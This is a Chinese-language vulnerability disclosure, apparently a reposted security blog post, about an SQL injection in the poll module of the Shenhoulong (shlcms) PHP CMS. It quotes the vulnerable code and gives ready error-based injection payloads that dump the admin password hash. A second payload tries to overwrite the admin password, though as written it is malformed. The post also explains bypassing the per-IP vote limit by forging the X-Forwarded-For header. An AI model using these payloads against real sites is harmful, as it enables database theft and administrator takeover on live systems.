(PS:这CMS的名字令人遐想) http://www.shenhoulong.com/ 隶属公司http://company.loooe.com/ /Deepthroat/content/poll/ -> index.php if ($request['vtype']=='a') 57 { 58 $db->query("UPDATE ".TB_PREFIX."poll SET num=num+1 WHERE id=".$request['choice']); 59 60 $db->query("UPDATE ".TB_PREFIX."poll_category SET client_ip='".$insert_ip."' WHERE id=".$params['args']); 61 62 echo 'alert("投票æˆåŠŸï¼");window.location.href="'.$url.'";'; 63 } 64 elseif ($request['vtype']=='b') 65 { 66 for ($i=0;$i 67 { 68 $db->query("UPDATE ".TB_PREFIX."poll SET num=num+1 WHERE id=".$request['choice'][$i]); 69 } 70 $db->query("UPDATE ".TB_PREFIX."poll_category SET client_ip='".$insert_ip."' WHERE id=".$params['args']); 71 72 echo 'alert("投票成功");window.location.href="'.$url.'";'; 73 } 74 } 投票处选项ID 参数choice没有做过滤就带入数据库查询导致注入 漏洞 的产生 UPDATE注射 唯有用显错注射 投票时抓包 choice参数改成SQL语句 POC: and (select 1 from (select count(*),concat((select ((select pwd from shl_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a); QQ截图20140112191109.jpg 密码很变态 加密函数:/Deepthroat/inc/ -> class.shlencryption.php 3 { 4 var $enstr = null; 5 function shlEncryption($str) 6 { 7 $this->enstr = $str; 8 } 9 function get_shal() 10 { 11 return sha1($this->enstr); 12 } 13 function get_md5() 14 { 15 return md5($this->enstr); 16 } 17 function get_jxqy3() 18 { 19 $tmpMS = $this->get_shal().$this->get_md5(); 20 $tmpNewStr = substr($tmpMS,0,9).'s'.substr($tmpMS,10,9).'h'.substr($tmpMS,20,9).'l'.substr($tmpMS,30,9).'s'.substr($tmpMS,40,9).'u'.substr($tmpMS,50,9).'n'.substr 21 ($tmpMS,60,9).'y'.substr($tmpMS,70,2); 22 $tmpNewStr = substr($tmpNewStr,-36).substr($tmpNewStr,0,36); 23 $tmpNewStr = substr($tmpNewStr,0,70); 24 $tmpNewStr = substr($tmpNewStr,0,14).'j'.substr($tmpNewStr,14,14).'x'.substr($tmpNewStr,28,14).'q'.substr($tmpNewStr,32,14).'y'.substr($tmpNewStr,56,14).'3'; 25 return $tmpNewStr; 26 } 27 function to_string() 28 { 29 $tmpstr = $this->get_jxqy3(); 30 $tmpstr = substr($tmpstr,-35).substr($tmpstr,0,40); 31 return $tmpstr; 32 } 33 } 34 ?> SHA1加密的值加上 MD5 加密 的值 然后各种substr HASH基本不能逆了 运气好的可以去UPDATE一下密码 把密码update成admin: and (select 1 from (select count(*),concat((select ((update pwd = '33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj' where username='admin')) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a); 虽然密码解密不了 但还可以基于SQL注射进行下一步 渗透 可投票时候做了限制 只允许一个IP投票一次 也就代表一个IP只能执行一次SQL注射语句 这对于进一步的渗透是很麻烦 /Deepthroat/content/poll/ -> index.php if(!empty($request['vtype'])&&!empty($request['choice'])) 33 { 34 $sql="SELECT * FROM ".TB_PREFIX."poll_category WHERE id=".$params['args']; 35 $poll_client=$db->get_row($sql); 36 $cur_ip=getip(); 37 if(empty($poll_client->client_ip)) 38 { 39 $insert_ip=$cur_ip; 40 } 41 else 42 { 43 $checkIP=split(';',$poll_client->client_ip); 44 if(in_array($cur_ip,$checkIP)) 45 { 46 echo "alert('您已经投过票了!');window.history.go(-1);"; 47 exit; 48 } 49 array_push($checkIP,$cur_ip); 50 $insert_ip=implode(';',$checkIP); 51 } 看看getip()函数 /Deepthroat/inc/function.php -> line 347 function getip() 348 { 349 if(getenv('HTTP_CLIENT_IP')) 350 { 351 $client_ip = getenv('HTTP_CLIENT_IP'); 352 } 353 elseif(getenv('HTTP_X_FORWARDED_FOR')) 354 { 355 $client_ip = getenv('HTTP_X_FORWARDED_FOR'); 356 } 357 elseif(getenv('REMOTE_ADDR')) 358 { 359 $client_ip = getenv('REMOTE_ADDR'); 360 } 361 else 362 { 363 $client_ip = $HTTP_SERVER_VAR['REMOTE_ADDR']; 364 } 365 return ip2long($client_ip); 那么利用X-FORWARDED-FOR可以伪造 从而突破限制 X-FORWARDED-FOR: 8.8.8.8
查看更多关于深喉咙CMS(shlcms PHP)SQL注射0day - 网站安全 - 自学的详细内容...